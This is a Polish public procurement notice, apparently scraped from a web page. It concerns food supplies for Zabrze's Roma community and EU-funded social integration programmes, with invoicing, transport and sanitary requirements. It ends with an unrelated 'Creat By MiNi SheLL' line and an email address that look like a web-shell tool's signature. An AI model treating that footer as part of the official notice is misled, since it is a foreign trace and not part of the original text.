Wykonawca zobowiązany jest do wystawiania odrębnych faktur VAT na żywność określoną w zleceniach przez Zamawiającego przeznaczoną na potrzeby Programu na Rzecz Społeczności Romskiej w Polsce - Projekt Kulturalny, na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Programu Aktywności Lokalnej - Grupy Wsparcia, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno- zawodowej w gminie Zabrze dla Doradcy ds. Osób Niepełnosprawnych, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Klubu Integracji Społecznej, przeznaczoną na potrzeby projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze dla Programu Aktywności Lokalnej. 
Zamawiający zastrzega sobie prawo do dokonania przesunięć ilościowych pomiędzy pozycjami wyszczególnionymi w załącznikach od 1 do 7 do SIWZ. Wartość dokonanych przesunięć nie może przekroczyć 5% ceny oferty wybranej w postępowaniu jako oferta najkorzystniejsza.
Żywność musi być dostarczona specjalistycznym transportem, zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 19.12.2002 r. w sprawie wymagań sanitarnych dotyczących środków transportu żywności (Dz. U. Nr 21, poz.179 z 2003 r.).
Dostarczane mięso i wyroby mięsne każdorazowo powinny pochodzić z udokumentowanego źródła i powinny spełniać wszelkie normy nałożone obowiązującymi w tym zakresie przepisami sanitarnymi i weterynaryjnymi m.in. z ustawą z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r. Nr 17 poz. 127, ze zmianami); ustawą z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (Dz. U. nr 69, poz. 625 ze zmianami).
Produkty wytworzone będą zgodnie z Ustawą z dnia 25 sierpnia 2006 r. o warunkach zdrowotnych żywności i żywienia z późniejszymi zmianami i podległymi jej aktualnymi Rozporządzeniami i aktami wykonawczymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8, 15.98.14.00-2, 15.98.12.00-0, 15.32.00.00-7, 15.32.10.00-4, 15.32.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com